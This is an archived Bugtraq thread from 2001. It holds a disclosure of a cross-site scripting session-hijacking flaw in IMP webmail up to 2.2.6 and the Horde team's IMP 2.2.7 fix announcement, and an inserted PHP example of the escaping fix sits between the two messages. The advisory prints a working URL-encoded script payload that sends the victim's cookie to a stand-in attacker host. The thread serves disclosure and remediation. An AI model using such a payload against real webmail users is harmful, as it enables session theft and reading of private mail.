7467685 2001-11-09 21:38 +0000  /84 lines/ Joao Pedro Goncalves <megas@phibernet.org>
Sent by: joel@lysator.liu.se
Imported: 2001-11-10 01:18 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: megas@phibernet.org
Recipient: Bugtraq (import) <19712>
Subject: Imp Webmail session hijacking vulnerability
------------------------------------------------------------
From: Joao Pedro Goncalves <megas@phibernet.org>
To: bugtraq@securityfocus.com
Message-ID: <01110921381901.10015@pinguim.sl.pt>

- It's possible to hijack an imp/horde session using a cross-site script
  attack, quite similar to the one explored by Marc Slemko in his
  "Microsoft Passport to Trouble" paper.
 
- After hijacking the cookies, the attacker can use the session and read
  the victim's mail.
 
- Imp webmail is part of the Horde Application Framework, at
  http://www.horde.org, which allows web access to an email account
  through pop3 or imap.

- Imp is included in the Linux Mandrake and Conectiva distributions.
  It's also available in the Red Hat PowerTools.

- It's used in several webmail sites, some of which have hundreds of
  thousands of users, and all of the ones tested were vulnerable. Some of
  the administrators were warned before this advisory was made public.
  Some have already been patched.
 
- All stable imp webmail versions, up to and including 2.2.6, are
  vulnerable; the devel version 2.3 and 3.0 Release Candidate 1 are
  not affected by this vulnerability.
 
- The horde team was warned about this and has committed a fix;
  a new version should be uploaded soon.
 
- To apply the patch, use

http://cvs.horde.org/diff.php/imp/Attic/status.php3?r1=2.7.2.22&r2=2.7.2.23&ty=u

  or just escape the $message variable:
  $message = htmlspecialchars($message);
  if your imp installation is already heavily customized.
 
 
- To exploit this vulnerability using a text message, the attacker sends an
  email with a URL which, if the user clicks on it, redirects to

http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.com%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%20%27%3E%27)%3B%3C%2Fscript%3E%0A

  which in turn redirects the user's browser to the attacker's server,
  where he hijacks the cookies that the browser used in the context of
  the webmail site, and therefore the session.
 
 
This attack is just one more example of how trusting user input is a
Bad Thing(tm), as well as of the risks inherent to cross-site script
attacks.
 
Please, pretty please: this was discovered while playing around with
cookie-based session sites, after reading about the MS Wallet attack
and seeing how, almost 2 years after the CERT advisory on these
techniques, lots of applications are still vulnerable. There are
probably lots of kids around exploiting similar vulnerabilities. So
check your web applications for similar vulnerabilities and ask
yourself how many times you have pasted directly into the html some
variable passed by the url or cookie.

 
- For more info on cross-site scripting, read CERT advisory and 
   Marc Slemko's paper.
 
 
Imp Project homepage:
http://www.horde.org/imp/
 
Marc Slemko's "Microsoft Passport to Trouble":
http://alive.znep.com/~marcs/passport/
 
CERT advisory on cross-site scripting
http://www.cert.org/advisories/CA-2000-02.html

 
 
João Pedro Gonçalves
megas@phibernet.org
Phibernet Information Network
(7467685) /Joao Pedro Goncalves <megas@phibernet.org>/(Rewrapped)
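The one-line fix the advisory suggests, shown against the unescaped behaviour it reports, as an added PHP example that is neither IMP's code nor the advisory author's. The page markup, the function names and the sample parameter value are assumptions constructed for the example; the only thing taken from the advisory is the escaping call itself.

```php
<?php
// Added example, not code from IMP or from the advisory: a minimal stand-in
// for a status page that echoes a request parameter, shown unescaped
// ("before", the behaviour the advisory reports) and escaped with
// htmlspecialchars() ("after", the one-line fix the advisory suggests).
// Function names and the page markup are assumptions.

// Before: $message is pasted straight into the document, so any markup in it
// is parsed and executed by the victim's browser in the webmail site's origin,
// with that site's cookies in scope.
function render_status_vulnerable($message)
{
    return '<html><body><p class="status">' . $message . '</p></body></html>';
}

// After: characters with meaning in HTML (&, <, >, ") become entities, so the
// browser displays the text instead of interpreting it. ENT_QUOTES also
// escapes single quotes, which matters if the value is ever placed inside a
// single-quoted attribute.
function render_status_fixed($message)
{
    $message = htmlspecialchars($message, ENT_QUOTES);
    return '<html><body><p class="status">' . $message . '</p></body></html>';
}

// Coarse textual check used by the demo: does the rendered page still contain
// a script tag the browser would run? Good enough for this example; a real
// review would also cover attribute and URL contexts.
function contains_live_script($html)
{
    return preg_match('/<script\b/i', $html) === 1;
}

// Constructed sample input: the decoded form of a query parameter like the one
// in the advisory, with a harmless alert() instead of the cookie-stealing body.
$sample = '<script language=javascript>alert(document.cookie);</script>';

// This is how the same value travels in the query string (percent-encoded);
// the web server and PHP decode it before it reaches the page, so the page
// sees the raw markup and must escape it itself.
$on_the_wire = 'message=' . rawurlencode($sample);
parse_str($on_the_wire, $query);
$message = $query['message'];

$before = render_status_vulnerable($message);
$after  = render_status_fixed($message);

echo 'encoded request:            ' . $on_the_wire . "\n";
echo 'vulnerable page has script: ' . var_export(contains_live_script($before), true) . "\n";
echo 'fixed page has script:      ' . var_export(contains_live_script($after), true) . "\n";
echo 'fixed page body:            ' . $after . "\n";
```

Run it with `php example.php`: in the vulnerable rendering the `<script>` tag survives intact, while in the fixed rendering it comes out as `&lt;script ...&gt;` and is displayed as text. The same check is worth repeating for every other place an installation echoes a URL or cookie value into a page, which is the audit the advisory asks administrators to do.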
7470256 2001-11-10 09:05 -0600  /46 lines/ Brent J. Nordquist <bjn@horde.org>
Sent by: joel@lysator.liu.se
Imported: 2001-11-10 16:29 by Brevbäraren
External recipient: imp@lists.horde.org
External recipient: announce@lists.horde.org
External CC recipient: bugtraq@securityfocus.com
External CC recipient: lwn@lwn.net
External CC recipient: megas@phibernet.org
External replies to: bjn@horde.org
Recipient: Bugtraq (import) <19713>
Subject: IMP 2.2.7 (SECURITY) released
------------------------------------------------------------
From: "Brent J. Nordquist" <bjn@horde.org>
To: <imp@lists.horde.org>, <announce@lists.horde.org>
Cc: <bugtraq@securityfocus.com>, <lwn@lwn.net>, <megas@phibernet.org>
Message-ID: <Pine.LNX.4.33.0111100855360.24820-100000@kepler.acns.bethel.edu>

The Horde team announces the availability of IMP 2.2.7, which fixes a
potential session hijacking vulnerability using a cross-site
scripting (CSS) attack.  We recommend that all sites running IMP
2.2.x upgrade to this version.

The Horde Project would like to thank João Pedro Gonçalves from the
Phibernet Information Network <megas@phibernet.org> for discovering
this problem and alerting us.  From his description:

> - It's possible to hijack an imp/horde session using a cross-site
> script attack, quite similar to the one explored by Marc Slemko in his
> "Microsoft Passport to Trouble" paper.
> 
> - After hijacking the cookies, the attacker can use the session and read
> the victim's mail.
> 
> - All stable imp webmail versions, up to and including 2.2.6, are
> vulnerable; the devel version 2.3 and 3.0 Release Candidate 1 are not
> affected by this vulnerability.

This release also has a new Chinese (Simplified) translation.

Download:

This release can be downloaded from the following locations:

	ftp://ftp.horde.org/pub/horde/
	ftp://ftp.horde.org/pub/imp/

MD5 checksums:

2433ed0e67739c41021b1a9397130a96  horde-1.2.7.tar.gz
b5c683e1dc862fd185c9be0ce7188894  imp-2.2.7.tar.gz
818199bc9a92cff07d109c4b43a22ffe  patch-horde-1.2.6-1.2.7.gz
556ddcabc72048ae53f4cfb00680e6f5  patch-imp-2.2.6-2.2.7.gz

-- 
Brent J. Nordquist <bjn@horde.org> N0BJN
Yahoo!: Brent_Nordquist / AIM: BrentJNordquist / ICQ: 76158942
(7470256) /Brent J. Nordquist <bjn@horde.org>/(Rewrapped)